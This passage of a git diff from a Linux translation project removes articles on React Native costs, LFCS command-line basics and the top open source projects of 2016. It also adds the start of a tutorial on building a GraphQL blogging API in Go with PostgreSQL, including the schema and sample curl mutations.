of the traditional cost without losing out on the benefits of native performance and quality. - -It is not unheard of for React Native apps to reuse up to 90% of their code across platforms, though the range is usually between 80% and 90%. - -If your team is using React Native, it eliminates the divide between teams resulting in more consistency in both the UI and the APIs being built, speeding up the development time. - -There is no need for compilation with React Native, as the app updates instantly when saving, also speeding up development time. - -React Native also allows you to use tools such as [Code Push][24] and [AppHub][25] to remotely update your JavaScript code. This means that you can push updates, features, and bug fixes instantly to your users, bypassing the labor of bundling, submitting, and having your app accepted to the App and Google play stores, a process that can take between 2 and 7 days (the App Store being the main pain point in this process). This is something that is not possible with native apps, though is possible with hybrid apps. - -If innovation in this space continues as it has been since it’s release, in the future you will even be able to build for platforms such as the [Apple Watch ][26], [Apple TV][27], and [Tizen][28] to name a few. - -> NativeScript is still fairly new as the framework powering it, Angular 2, [was just released out of beta a few months ago,][29] but it too has a promising future as long as Angular2 holds on to a decent share of the market. - -What you may not know is that some of the most innovative and largest technology companies in the world are betting big on these types of technologies, specifically [React Native.][30] - -I have also spoken to and am working with multiple enterprise and fortune 500 companies currently making the switch to React Native. - -### Notably Using React Native in Production - -Along with the below examples, [here is a list of notable apps using React Native.][31] - -### Facebook - - ![](https://cdn-images-1.medium.com/max/800/1*36atCP-kVNoYrit2RMR-8g.jpeg) - -React Native Apps by Facebook - -Facebook is now using React Native for both [Ads Manager][32] and [Facebook Groups,][33] and [will be implementing the framework to power it’s news feed.][34] - -Facebook also spends a lot of money creating and maintaining open source projects such as React Native, and t[hey and their open source developers have done a fantastic job lately by creating a lot of awesome projects ][35]that people like me and businesses all around the world benefit greatly from using on a daily basis. - -### Instagram - - - ![](https://cdn-images-1.medium.com/max/800/1*MQ0ezjRsUW3A5I0ahryHPg.jpeg) - -Instagram - -React Native has been implemented in parts of the Instagram mobile app. - -### Airbnb - - - ![](https://cdn-images-1.medium.com/max/800/1*JS3R_cfLsDFCmAZJmtVEvg.jpeg) - -Airbnb - -Much of Airbnb is being rewritten in React Native (via [Leland Richardson][36]) - - - - -Over 90% of the Airbnb Trips Platform is written in React Native (via [spikebrehm][37]) - - - -### Vogue - - - ![](https://cdn-images-1.medium.com/max/800/1*V9JMA2L3lXcO1nczCN3gcA.jpeg) - -Vogue Top 10 apps of 2016 - -Vogue stands out not only because it was also written in React Native, but [because it was ranked as one of the 10 Best Apps of the Year, according to Apple][38]. - - - ![](https://cdn-images-1.medium.com/max/800/1*vPDVV-vwvjfL3MsHpOO8rQ.jpeg) - -Microsoft - -Microsoft is betting heavily on React Native. - -They have already release multiple open source tools, including [Code Push][39], [React Native VS Code,][40] and [React Native Windows][41], in the shift towards helping developers in the React Native space. - -Their thoughts behind this are that if people are already building their apps using React Native for iOS and Android, and they can reuse up to 90% of their code, then s_hipping to Windows costs them little extra relative to the cost && time already spent building the app in the first place._ - -Microsoft has contributed extensively to the React Native ecosystem and have done an excellent job in the Open Source space over the past few years. - -### Conclusion - -React Native and similar technologies are the next step and a paradigm shift in how we will build mobile UIS and mobile applications. - -Companies - -If your company is looking to cut costs and speed up development time without compromising on quality or performance, React Native is ready for prime time and will benefit your bottom line. - -Developers - -If you are a developer and want to enter into an rapidly evolving space with substantial future up side, I would highly recommend looking at adding React Native to your list of things to learn. - -If you know JavaScript, you can hit the ground running very quickly, and I would recommend first trying it out using [Exponent][5] and seeing what you think. Exponent allows developers to easily build, test ,and deploy cross platform React Native apps on both Windows and macOS. - -If you are already a native Developer, you will benefit especially because you will be able to competently dig into the native side of things when needed, something that is not needed often but when needed is a highly valuable skill to have on a team. - -I have spent a lot of my time learning and teaching others about React Native because I am extremely excited about it and it is just plain fun to create apps using the framework. - -Thanks for reading. - --------------------------------------------------------------------------------- - -作者简介: - -![](https://cdn-images-1.medium.com/fit/c/60/60/1*uindYEb0zBpZTRV4suSkfg.jpeg) - -Software Developer Specializing in Teaching and Building React Native - --------------------------------------------------------------------------------- - -via: https://hackernoon.com/the-cost-of-native-mobile-app-development-is-too-damn-high-4d258025033a - -作者:[Nader Dabit][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://hackernoon.com/@dabit3 -[1]:http://www.indeed.com/salary -[2]:http://www.payscale.com/research/US/Skill=JavaScript/Salary -[3]:http://www.comentum.com/mobile-app-development-cost.html -[4]:http://www.smartinsights.com/mobile-marketing/mobile-marketing-analytics/mobile-marketing-statistics/attachment/percent-time-spent-on-mobile-apps-2016/ -[5]:https://medium.com/u/df61a4267d7a -[6]:http://www.bizjournals.com/charlotte/how-to/human-resources/2016/12/employers-offer-premium-wages-skilled-workers.html -[7]:https://www.cnet.com/news/silicon-valley-talent-wars-engineers-come-get-your-250k-salary/ -[8]:http://www.nytimes.com/2015/08/19/technology/unicorns-hunt-for-talent-among-silicon-valleys-giants.html -[9]:http://blogs.wsj.com/cio/2016/09/30/tech-talent-war-moves-to-africa/ -[10]:https://devchat.tv/react-native-radio/08-bridging-react-native-components-with-tadeu-zagallo -[11]:https://facebook.github.io/react-native/ -[12]:https://medium.com/javascript-scene/native-apps-are-doomed-ac397148a2c0#.w06yd23ej -[13]:https://medium.com/u/c359511de780 -[14]:http://ben-evans.com/benedictevans/2016/12/8/mobile-is-eating-the-world -[15]:http://www.indeed.com/salary?q1=javascript+developer&l1=united+states&tm=1 -[16]:https://ionicframework.com/ -[17]:https://medium.com/lunabee-studio/why-hybrid-apps-are-crap-6f827a42f549#.lakqptjw6 -[18]:https://techcrunch.com/2012/09/11/mark-zuckerberg-our-biggest-mistake-with-mobile-was-betting-too-much-on-html5/ -[19]:https://www.nativescript.org/ -[20]:https://facebook.github.io/react-native/ -[21]:https://github.com/ptmt/react-native-macos -[22]:https://github.com/necolas/react-native-web -[23]:https://facebook.github.io/react/ -[24]:http://microsoft.github.io/code-push/ -[25]:https://apphub.io/ -[26]:https://github.com/elliottsj/apple-watch-uikit -[27]:https://github.com/douglowder/react-native-appletv -[28]:https://www.tizen.org/blogs/srsaul/2016/samsung-committed-bringing-react-native-tizen -[29]:http://angularjs.blogspot.com/2016/09/angular2-final.html -[30]:https://facebook.github.io/react-native/ -[31]:https://facebook.github.io/react-native/showcase.html -[32]:https://play.google.com/store/apps/details?id=com.facebook.adsmanager -[33]:https://itunes.apple.com/us/app/facebook-groups/id931735837?mt=8 -[34]:https://devchat.tv/react-native-radio/40-navigation-in-react-native-with-eric-vicenti -[35]:https://code.facebook.com/projects/ -[36]:https://medium.com/u/41a8b1601c59 -[37]:https://medium.com/u/71a78c1b069b -[38]:http://www.highsnobiety.com/2016/12/08/iphone-apps-best-of-the-year-2016/ -[39]:http://microsoft.github.io/code-push/ -[40]:https://github.com/Microsoft/vscode-react-native -[41]:https://github.com/ReactWindows/react-native-windows -[42]:https://twitter.com/dabit3 -[43]:http://reactnative.training/ diff --git a/sources/tech/20161222 LFCS Command Line Basics.md b/sources/tech/20161222 LFCS Command Line Basics.md deleted file mode 100644 index 063ceb948a..0000000000 --- a/sources/tech/20161222 LFCS Command Line Basics.md +++ /dev/null @@ -1,96 +0,0 @@ -LFCS Command Line Basics -======================= - -There are quite a few command line basics to cover in this article. We will go over the TeleTYpe (TTY) and a few commands with operators. Be sure to practice all of these and be aware that these are the same for CentOS and Ubuntu unless otherwise noted. - -**TTY** - -The TTY is used in Linux when there is no Graphical User Interface (GUI) running or when the user is outside of the GUI. TTY is also used when a terminal window is opened, but these are different types of TTY. - -There are three types of TTYs: - -1. Physical -2. Local Pseudo -3. Remote Pseudo - -Basically, each Linux system has around six or seven Physical TTYs. These are accessible by holding down a CTRL+ALT key and pressing F1 through F6 for CentOS and CTRL+ALT and F1 through F7 for Ubuntu. - -**NOTE: **Some distros might have a different number of TTYs and different defaults for the GUI. Some distros may have a different key combination of CTRL+F# or ALT+F# to change between the Physical TTYs. When using VirtualBox use the Right CTRL key unless you have changed the Host key. - -In CentOS the GUI will be on TTY 1 (CTRL+ALT+F1) and the other Physical TTYs are text based. On Ubuntu the GUI is on TTY 7 (CTRL+ALT+F7) and the other Physical TTYs are text based. - -**NOTE:** It is not wise to attempt to load the GUI under another TTY since this can use up a lot of resources, but it is possible. - -When Linux starts up, whether CentOS or Ubuntu, the default TTY is opened. If a GUI is installed then it goes to TTY1 for CentOS and TTY7 for Ubuntu. If you open a Terminal window (Pseudo TTY) and use the command 'who' you will see a listing of TTYs in use. An example is shown in Figure 1. - - ![Figure 01.jpg](https://www.linuxforum.com/attachments/figure-01-jpg.93/) - -**FIGURE 1** - -In Figure 1 you can see that I am currently logged in to TTY1 (non-GUI). The second line of connections show that I am logged in to the GUI (TTY7) as well as two Pseudo TTYs (PTS/1 and PTS/2). Looking at Figure 2 you can see that the new entry shows a Remote Pseudo TTY (PTS/3). The Remote Pseudo connection is from a system with the IP address of 192.168.0.11. - - ![Figure 02.jpg](https://www.linuxforum.com/attachments/figure-02-jpg.94/) - -**FIGURE 2** - -Remote TTY connections can be made with applications such as 'PuTTY' or any SSH Client (if SSH is enabled on the remote Linux system). - -If a terminal window has small fonts you can use the keys CTRL+SHIFT and the '+' to enlarge the fonts. Press it multiple times to make it even bigger each time. To shrink it down in size use the CTRL+- to continually make it smaller. To make the terminal font back to the original size press CTRL+0. - -**NOTE:** Be aware that the font will only get so large or so small before the key combination will not work anymore. - -Hopefully you now understand the various type of TTYs. Let's look at some of the commands which can be used in a TTY. - -**Commands** - -One of the commands was already discussed previously. The command 'who' is used to show who is logged onto a system. - -Another command is 'pwd'. The command 'pwd' stands for 'Print Working Directory'. The command returns the current directory in which you are located. For example, if the terminal prompt is '[jbuse@localhost ~]$' the username is 'jbuse' and the current directory is ~. The tilde (~) designates the user's home folder. The home folder should be '/home/_username_'. The username is the name used to log into the system. - -To list the contents of the current folder use the command 'ls'. The 'ls' command stands for List. If no options are specified then the current folder is listed. If you give a folder name then the contents of that folder is listed. For example, to see the contents of the contents of the 'media' folder you would use the command 'ls /media'. - -Along with the 'ls' command are a few options we can add to show more detail or specific details. If you wish to see all folder and files, even the hidden ones, use the option '-a'. To see all files and folders in the current directory use the command 'ls -a'. Hidden files and folders will appear with a period in front of the name. - -To see a forward slash (/) after each folder name use the option '-F'. A listing of the current folder would be 'ls -F'. The '-F' is used to classify the files by file type. Symbolic links are signified by '@' after the folder name. - -You can put the two together to have a command of 'ls -aF'. - -**NOTE:** Some options may be of different cases. The options can be case-sensitive. - -Another option is the '-l' for a long listing. A sample output is shown in Figure 3\. The folder and file names are listed to the right side. The files are colored white, the folders are dark blue and the symbolic links are light blue. As you can see in Figure 3 the symbolic link 'vtrgb' is linked from '/etc/alternatives/vtrgb'. - - ![Figure 03.jpg](https://www.linuxforum.com/attachments/figure-03-jpg.95/) - -**FIGURE 3** - -The first column to the left is the permissions for the file or folder. The first letter is either a 'd' for directory or a '-' for a file. The next three letters show permissions for the owner ('r' – read, 'w' – write and 'x' – execute) followed by the group permissions and permissions for 'others'. The next column of numbers shows the number of links to the file or folder. The next column is the owner name followed by the group name of ownership. The next column is the number of bytes which the file or folder takes up on the storage device. The next three columns are the month, day and year the file was last modified. Finally, the final column is the path name. - -So far you have seen that the listing is sorted alphabetically. To reverse the order from 'z to a' and not 'a to z' use the '-r' option. The '-r' or reverse option causes the ls command to reverse the output order. - -To list the files by the modified timestamp use the '-t' option. The order is from the most recently modified to the oldest modification date. Of course to reverse the order use both the '-t' and the '-r' together in the command 'ls -tr'. - -If you do not like looking at the long number of bytes which the file takes up use the option '-h'. The output will be more readable such as '4.0K' and not '4096'. - -To get specific information on a single folder use the option '-d', but the folder must be specified. For example to see the specifics for the folder '/media' use the command 'ls -ld /media'. - -Another command to be familiar with is the command 'cat'. The command 'cat' is used to copy a standard input (a file) to the standard output (the screen). Use 'cat' to easily view the contents of a file. For example to see the contents of a file called 'text' use the command 'cat text' if you are in the same folder as the file 'text'. If you are not in the same folder then you must specify the location. For example, if the file 'text' is in the folder '/home/jarret/test/' then the command would be 'cat /home/jarret/test/text'. - -Another very useful command is 'man'. The 'man' command is used to view documentation for specific commands. For example, to see the MANual pages for the command 'ls' use the command 'man ls'. - -**NOTE:** Remember that on the LFCS exam you have access to the 'man' command and can use it. - -Look over these commands and test them out to be familiar with them. Use the 'man' command and look over the commands covered in this article to see what other options are available. - -**NOTE:** I tend to use the word 'options' for the characters passed to a command to change its function or output. Some people may use the words 'parameters', 'arguments' and the like. They tend to be interchangeable. - --------------------------------------------------------------------------------- - -via: https://www.linuxforum.com/threads/lfcs-command-line-basics.3334/ - -作者:[Jarret][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxforum.com/members/jarret.268/ diff --git a/sources/tech/20161222 Top open source creative tools in 2016.md b/sources/tech/20161222 Top open source creative tools in 2016.md index ce320518fa..b870581efa 100644 --- a/sources/tech/20161222 Top open source creative tools in 2016.md +++ b/sources/tech/20161222 Top open source creative tools in 2016.md @@ -1,3 +1,5 @@ +Translating by StdioA + Top open source creative tools in 2016 ============================================================ diff --git a/sources/tech/20161226 Top 10 open source projects of 2016.md b/sources/tech/20161226 Top 10 open source projects of 2016.md deleted file mode 100644 index 362007b4b1..0000000000 --- a/sources/tech/20161226 Top 10 open source projects of 2016.md +++ /dev/null @@ -1,181 +0,0 @@ -ucasFL translating -Top 10 open source projects of 2016 -============================================================ - -### In our annual list of the year's top open source projects, we look back at popular projects our writers covered in 2016, plus favorites our Community Moderators picked. - - ![Top 10 open source projects of 2016](https://opensource.com/sites/default/files/styles/image-full-size/public/images/law/bowling-10-ten-520_cc.png?itok=Jd1FYLWt "Top 10 open source projects of 2016") - -Image by : [George Eastman House][1] and [Internet Archive Book Images][2]. Modified by Opensource.com. CC BY-SA 4.0 - -We continue to be impressed with the wonderful open source projects that emerge, grow, change, and evolve every year. Picking 10 to include in our annual list of top projects is no small feat, and certainly no list this short can include every deserving project. - -To choose our 10, we looked back at popular open source projects our writers covered in 2016, and collected suggestions from our Community Moderators. After a round of nominations and voting by our moderators, our editorial team narrowed down the final list. - -So here they are, our top 10 open source projects of 2016: - -### Atom - -[Atom][3] is a hackable text editor from GitHub. Jono Bacon [wrote][4] about its "simple core" earlier this year, exclaiming approval for open source projects that give users options. - -"[Atom] delivers the majority of the core features and settings that most users likely will want, but is missing many of the more advanced or specific features some users may want. … Atom provides a powerful framework that allows pretty much any part of Atom to be changed and expanded." - -To get started contributing, read the [guide][5]. To connect with other users and the community, find Atom on [GitHub][6], [Discuss][7], and [Slack][8]. - -Atom is [MIT][9] licensed and the [source code][10] is hosted on GitHub. - -### Eclipse Che - -[Eclipse Che][11] is a next-generation online integrated development environment (IDE) and developer workspace. Joshua Allen Holm brought us a [review][12] of Eclipse Che in November 2016, which provided a look at the developer community behind the project, its innovative use of container technology, and popular languages it supports out of the box. - -"The ready-to-go bundled stacks included with Eclipse Che cover most of the modern popular languages. There are stacks for C++, Java, Go, PHP, Python, .NET, Node.js, Ruby on Rails, and Android development. A Stack Library provides even more options and if that is not enough, there is the option to create a custom stack that can provide specialized environments." - -You can test out Eclipse Che in an online [hosted account][13], through a [local installation][14], or in your preferred [cloud provider][15]. The [source code][16] can be found on GitHub under an [Eclipse Public License][17]. - -### FreeCAD - -[FreeCAD][18] is written in Python and one of the many computer-aided design—or computer-aided drafting—tools available to create design specifications for real-world objects. Jason Baker wrote about FreeCAD in [3 open source alternatives to AutoCAD][19]. - -"FreeCAD can import and export from a variety of common formats for 3D objects, and its modular architecture makes it easy to extend the basic functionality with various plug-ins. The program has many built-in interface options, from a sketcher to renderer to even a robot simulation ability." - -FreeCAD is [LGPL][20] licensed and the [source code][21] is hosted on GitHub. - -### GnuCash - -[GnuCash][22] is a cross-platform open source desktop solution for managing your personal and small business accounts. Jason Baker included GnuCash in our [roundup][23] of the open source alternatives to Mint and Quicken for personal finance. - -GnuCash "features multi-entry bookkeeping, can import from a wide range of formats, handles multiple currencies, helps you create budgets, prints checks, creates custom reports in Scheme, and can import from online banks and pull stock quotes for you directly." - -You can find GnuCash's [source code][24] on GitHub under a GPL [version 2 or 3 license][25]. - -An honorable mention goes to GnuCash alternative [KMyMoney][26], which also received a nomination for our list, and is another great option for keeping your finances in Linux. - -### Kodi - -[Kodi][27] is an open source media center solution, formerly known as XBMC, which works on a variety of devices as a do-it-yourselfer's tool to building a set-top box for playing movies, TV, music, and more. It is heavily customizable, and supports numerous skins, plugins, and a variety of remote control devices (including its own custom Android remote for your phone). - -Although we didn't cover Kodi in-depth this year, it kept popping up in articles on building a home Linux [music server][28], media [management tools][29], and even a previous poll on favorite open source [video players][30]. (If you're using Kodi at home and want to write about your experience, [let us know][31].) - -The [source code][32] to Kodi can be found on GitHub under a [GPLv2][33] license. - -### MyCollab - -[MyCollab][34] is a suite of tools for customer relationship management, document management, and project management. Community Moderator Robin Muilwijk covered the details of the project management tool MyCollab-Project in his roundup of [Top 11 project management tools for 2016][35]. - -"MyCollab-Project includes many features, like a Gantt chart and milestones, time tracking, and issue management. It also supports agile development models with its Kanban board. MyCollab-Project comes in three editions, of which the [community edition][36] is the free and open source option." - -Installing MyCollab requires a Java runtime and MySQL stack. Visit the [MyCollab site][37] to learn how to contribute to the project. - -MyCollab is AGPLv3 licensed and the [source code][38] is hosted on GitHub. - -### OpenAPS - -[OpenAPS][39] is another project that our moderators found interesting in 2016, but also one that we have yet to cover in depth. OpenAPS, the Open Artificial Pancreas System project, is an open source project devoted to improving the lives of people with Type 1 diabetes. - -The project includes "[a safety-focused reference design,][40] a[ toolset][41], and an open source [reference implementation][42]" designed for device manufacturers or any individual to be able to build their own artificial pancreas device to be able to safely regulate blood glucose levels overnight by adjusting insulin levels. Although potential users should examine the project carefully and discuss it with their healthcare provider before trying to build or use the system themselves, the project founders hope opening up technology will accelerate the research and development pace across the medical devices industry to discover solutions and bring them to market even faster. - -### OpenHAB - -[OpenHAB][43] is a home automation platform with a pluggable architecture. Community Moderator D Ruth Bavousett [wrote][44] about OpenHAB after buying a home this year and trying it out. - -"One of the interesting modules I found was the Bluetooth binding; it can watch for the presence of specific Bluetooth-enabled devices (your smartphone, and those of your children, for instance) and take action when that device arrives or leaves—lock or unlock doors, turn on lights, adjust your thermostat, turn off security modes, and so on." - -Check out the [full list of binding and bundles][45] that provide integration and communication with social networks, instant messaging, cloud IoT platforms, and more. - -OpenHAB is EPL licensed and the [source code][46] is hosted on GitHub. - -### OpenToonz - -[OpenToonz][47] is production software for 2D animation. Community Moderator Joshua Allen Holm [reported][48] on its open source release in March 2016, and it has been mentioned in other animation-related articles on Opensource.com, but we haven't covered it in depth. Stay tuned for that. - -In the meantime, we can tell you that there are a number of features unique to OpenToonz, including GTS, which is a spanning tool developed by Studio Ghibli, and [a plug-in effect SDK][49] for image processing. - -To discuss development and video research topics, check out the [forum][50] on GitHub. OpenToonz [source code][51] is hosted on GitHub and the project is licensed under a modified BSD license. - -### Roundcube - -[Roundcube][52] is a modern, browser-based email client that provides much—if not all—of the functionality email users may be used to with a desktop client. Featuring support for more than 70 languages, integrated spell-checking, a drag-and-drop interface, a feature-rich address book, HTML email composition, multiple search features, PGP encryption support, threading, and more, Roundcube can work as a drop-in replacement email client for many users. - -Roundcube was included along with four other solutions in our roundup of open source [alternatives to Gmail][53]. - -You can find the [source code][54] to Roundcube on GitHub under a [GPLv3][55] license. In addition to [downloading][56] and installing the project directly, you can also find it inside many complete email server packages, including [Kolab Groupware][57], [iRedMail][58], [Mail-in-a-Box][59], and [mailcow][60]. - --------------------------------------------------------------------------------- - -作者简介: - -![](https://opensource.com/sites/default/files/styles/profile_pictures/public/jen-headshot-square.jpeg?itok=GTMugLtD) - -Jen Wike Huger - Jen Wike Huger is the Content Manager for Opensource.com. She manages the publication calendar, coordinates the editing team, and guides new and current writers. Follow her on Twitter @jenwike, and see her extended portfolio at Jen.io. - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/16/12/yearbook-top-10-open-source-projects - -作者:[Jen Wike Huger ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/jen-wike -[1]:https://www.flickr.com/photos/george_eastman_house/ -[2]:https://www.flickr.com/photos/internetarchivebookimages/14784547612/in/photolist-owsEVj-odcHUi-osAjiE-x91Jr9-obHow3-owt68v-owu56t-ouySJt-odaPbp-owajfC-ouBSeL-oeTzy4-ox1okT-odZmpW-ouXBnc-ot2Du4-ocakCh-obZ8Pp-oeTNDK-ouiMZZ-ie12mP-oeVPhH-of2dD4-obXM65-owkSzg-odBEbi-oqYadd-ouiNiK-icoz2G-ie4G4G-ocALsB-ouHTJC-wGocbd-osUxcE-oeYNdc-of1ymF-idPbwn-odoerh-oeSekw-ovaayH-otn9x3-ouoPm7-od8KVS-oduYZL-obYkk3-hXWops-ocUu6k-dTeHx6-ot6Fs5-ouXK46 -[3]:https://atom.io/ -[4]:https://opensource.com/life/16/2/culture-pluggable-open-source -[5]:https://github.com/atom/atom/blob/master/CONTRIBUTING.md -[6]:https://github.com/atom/atom -[7]:http://discuss.atom.io/ -[8]:http://atom-slack.herokuapp.com/ -[9]:https://raw.githubusercontent.com/atom/atom/master/LICENSE.md -[10]:https://github.com/atom/atom -[11]:http://www.eclipse.org/che/ -[12]:https://opensource.com/life/16/11/introduction-eclipse-che -[13]:https://www.eclipse.org/che/getting-started/cloud/ -[14]:https://www.eclipse.org/che/getting-started/download/ -[15]:https://bitnami.com/stack/eclipse-che -[16]:https://github.com/eclipse/che/ -[17]:https://github.com/eclipse/che/blob/master/LICENSE -[18]:http://www.freecadweb.org/ -[19]:https://opensource.com/alternatives/autocad -[20]:https://github.com/FreeCAD/FreeCAD/blob/master/COPYING -[21]:https://github.com/FreeCAD/FreeCAD -[22]:https://www.gnucash.org/ -[23]:https://opensource.com/life/16/1/3-open-source-personal-finance-tools-linux -[24]:https://github.com/Gnucash/ -[25]:https://github.com/Gnucash/gnucash/blob/master/LICENSE -[26]:https://kmymoney.org/ -[27]:https://kodi.tv/ -[28]:https://opensource.com/life/16/1/how-set-linux-based-music-server-home -[29]:https://opensource.com/life/16/6/tinymediamanager-catalogs-your-movie-and-tv-files -[30]:https://opensource.com/life/15/11/favorite-open-source-video-player -[31]:https://opensource.com/how-submit-article -[32]:https://github.com/xbmc/xbmc -[33]:https://github.com/xbmc/xbmc/blob/master/LICENSE.GPL -[34]:https://community.mycollab.com/ -[35]:https://opensource.com/business/16/3/top-project-management-tools-2016 -[36]:https://github.com/MyCollab/mycollab -[37]:https://community.mycollab.com/docs/developing-mycollab/how-can-i-contribute-to-mycollab/ -[38]:https://github.com/MyCollab/mycollab -[39]:https://openaps.org/ -[40]:https://openaps.org/reference-design -[41]:https://github.com/openaps/openaps -[42]:https://github.com/openaps/oref0/ -[43]:http://www.openhab.org/ -[44]:https://opensource.com/life/16/4/automating-your-home-openhab -[45]:http://www.openhab.org/features/supported-technologies.html -[46]:https://github.com/openhab/openhab -[47]:https://opentoonz.github.io/e/index.html -[48]:https://opensource.com/life/16/3/weekly-news-march-26 -[49]:https://github.com/opentoonz/plugin_sdk -[50]:https://github.com/opentoonz/opentoonz/issues -[51]:https://github.com/opentoonz/opentoonz -[52]:https://roundcube.net/ -[53]:https://opensource.com/alternatives/gmail -[54]:https://github.com/roundcube/roundcubemail -[55]:https://github.com/roundcube/roundcubemail/blob/master/LICENSE -[56]:https://roundcube.net/download/ -[57]:http://kolab.org/ -[58]:http://www.iredmail.org/ -[59]:https://mailinabox.email/ -[60]:https://mailcow.email/ diff --git a/sources/tech/201701 GraphQL In Use: Building a Blogging Engine API with Golang and PostgreSQL.md b/sources/tech/201701 GraphQL In Use: Building a Blogging Engine API with Golang and PostgreSQL.md new file mode 100644 index 0000000000..07c779138e --- /dev/null +++ b/sources/tech/201701 GraphQL In Use: Building a Blogging Engine API with Golang and PostgreSQL.md @@ -0,0 +1,402 @@ +GraphQL In Use: Building a Blogging Engine API with Golang and PostgreSQL +============================================================ + +### Abstract + +GraphQL appears hard to use in production: the graph interface is flexible in its modeling capabilities but is a poor match for relational storage, both in terms of implementation and performance. + +In this document, we will design and write a simple blogging engine API, with the following specification: + +* three types of resources (users, posts and comments) supporting a varied set of functionality (create a user, create a post, add a comment to a post, follow posts and comments from another user, etc.) +* use PostgreSQL as the backing data store (chosen because it’s a popular relational DB) +* write the API implementation in Golang (a popular language for writing APIs). + +We will compare a simple GraphQL implementation with a pure REST alternative in terms of implementation complexity and efficiency for a common scenario: rendering a blog post page. + +### Introduction + +GraphQL is an IDL (Interface Definition Language), designers define data types and model information as a graph. Each vertex is an instance of a data type, while edges represent relationships between nodes. This approach is flexible and can accommodate any business domain. However, the problem is that the design process is more complex and traditional data stores don’t map well to the graph model. See _Appendix 1_ for more details on this topic. + +GraphQL has been first proposed in 2014 by the Facebook Engineering Team. Although interesting and compelling in its advantages and features, it hasn’t seen mass adoption. Developers have to trade REST’s simplicity of design, familiarity and rich tooling for GraphQL’s flexibility of not being limited to just CRUD and network efficiency (it optimizes for round-trips to the server). + +Most walkthroughs and tutorials on GraphQL avoid the problem of fetching data from the data store to resolve queries. That is, how to design a database using general-purpose, popular storage solutions (like relational databases) to support efficient data retrieval for a GraphQL API. + +This document goes through building a blog engine GraphQL API. It is moderately complex in its functionality. It is scoped to a familiar business domain to facilitate comparisons with a REST based approach. + +The structure of this document is the following: + +* in the first part we will design a GraphQL schema and explain some of features of the language that are used. +* next is the design of the PostgreSQL database in section two. +* part three covers the Golang implementation of the GraphQL schema designed in part one. +* in part four we compare the task of rendering a blog post page from the perspective of fetching the needed data from the backend. + +### Related + +* The excellent [GraphQL introduction document][1]. +* The complete and working code for this project is on [github.com/topliceanu/graphql-go-example][2]. + +### Modeling a blog engine in GraphQL + +_Listing 1_ contains the entire schema for the blog engine API. It shows the data types of the vertices composing the graph. The relationships between vertices, ie. the edges, are modeled as attributes of a given type. + +``` +type User { + id: ID + email: String! + post(id: ID!): Post + posts: [Post!]! + follower(id: ID!): User + followers: [User!]! + followee(id: ID!): User + followees: [User!]! +} + +type Post { + id: ID + user: User! + title: String! + body: String! + comment(id: ID!): Comment + comments: [Comment!]! +} + +type Comment { + id: ID + user: User! + post: Post! + title: String + body: String! +} + +type Query { + user(id: ID!): User +} + +type Mutation { + createUser(email: String!): User + removeUser(id: ID!): Boolean + follow(follower: ID!, followee: ID!): Boolean + unfollow(follower: ID!, followee: ID!): Boolean + createPost(user: ID!, title: String!, body: String!): Post + removePost(id: ID!): Boolean + createComment(user: ID!, post: ID!, title: String!, body: String!): Comment + removeComment(id: ID!): Boolean +} +``` + +_Listing 1_ + +The schema is written in the GraphQL DSL, which is used for defining custom data types, such as `User`, `Post` and `Comment`. A set of primitive data types is also provided by the language, such as `String`, `Boolean` and `ID` (which is an alias of `String` with the additional semantics of being the unique identifier of a vertex). + +`Query` and `Mutation` are optional types recognized by the parser and used in querying the graph. Reading data from a GraphQL API is equivalent to traversing the graph. As such a starting vertex needs to be provided; this role is fulfilled by the `Query` type. In this case, all queries to the graph must start with a user specified by id `user(id:ID!)`. For writing data, the `Mutation` vertex type is defined. This exposes a set of operations, modeled as parameterized attributes which traverse (and return) the newly created vertex types. See _Listing 2_ for examples of how these queries might look. + +Vertex attributes can be parameterized, ie. accept arguments. In the context of graph traversal, if a post vertex has multiple comment vertices, you can traverse just one of them by specifying `comment(id: ID)`. All this is by design, the designer can choose not to provide direct paths to individual vertices. + +The `!` character is a type post-fix, works for both primitive or user-defined types and has two semantics: + +* when used for the type of a param in a parametriezed attribute, it means that the param is required. +* when used for the return type of an attribute it means that the attribute will not be null when the vertex is retrieved. +* combinations are possible, for instance `[Comment!]!` represents a list of non-null Comment vertices, where `[]`, `[Comment]` are valid, but `null, [null], [Comment, null]` are not. + +_Listing 2_ contains a list of _curl_ commands against the blogging API which will populate the graph using mutations and then query it to retrieve data. To run them, follow the instructions in the [topliceanu/graphql-go-example][3] repo to build and run the service. + +``` +# Mutations to create users 1,2 and 3\. Mutations also work as queries, in these cases we retrieve the ids and emails of the newly created users. +curl -XPOST http://vm:8080/graphql -d 'mutation {createUser(email:"user1@x.co"){id, email}}' +curl -XPOST http://vm:8080/graphql -d 'mutation {createUser(email:"user2@x.co"){id, email}}' +curl -XPOST http://vm:8080/graphql -d 'mutation {createUser(email:"user3@x.co"){id, email}}' +# Mutations to add posts for the users. We retrieve their ids to comply with the schema, otherwise we will get an error. +curl -XPOST http://vm:8080/graphql -d 'mutation {createPost(user:1,title:"post1",body:"body1"){id}}' +curl -XPOST http://vm:8080/graphql -d 'mutation {createPost(user:1,title:"post2",body:"body2"){id}}' +curl -XPOST http://vm:8080/graphql -d 'mutation {createPost(user:2,title:"post3",body:"body3"){id}}' +# Mutations to all comments to posts. `createComment` expects the user's ID, a title and a body. See the schema in Listing 1. +curl -XPOST http://vm:8080/graphql -d 'mutation {createComment(user:2,post:1,title:"comment1",body:"comment1"){id}}' +curl -XPOST http://vm:8080/graphql -d 'mutation {createComment(user:1,post:3,title:"comment2",body:"comment2"){id}}' +curl -XPOST http://vm:8080/graphql -d 'mutation {createComment(user:3,post:3,title:"comment3",body:"comment3"){id}}' +# Mutations to have the user3 follow users 1 and 2\. Note that the `follow` mutation only returns a boolean which doesn't need to be specified. +curl -XPOST http://vm:8080/graphql -d 'mutation {follow(follower:3, followee:1)}' +curl -XPOST http://vm:8080/graphql -d 'mutation {follow(follower:3, followee:2)}' + +# Query to fetch all data for 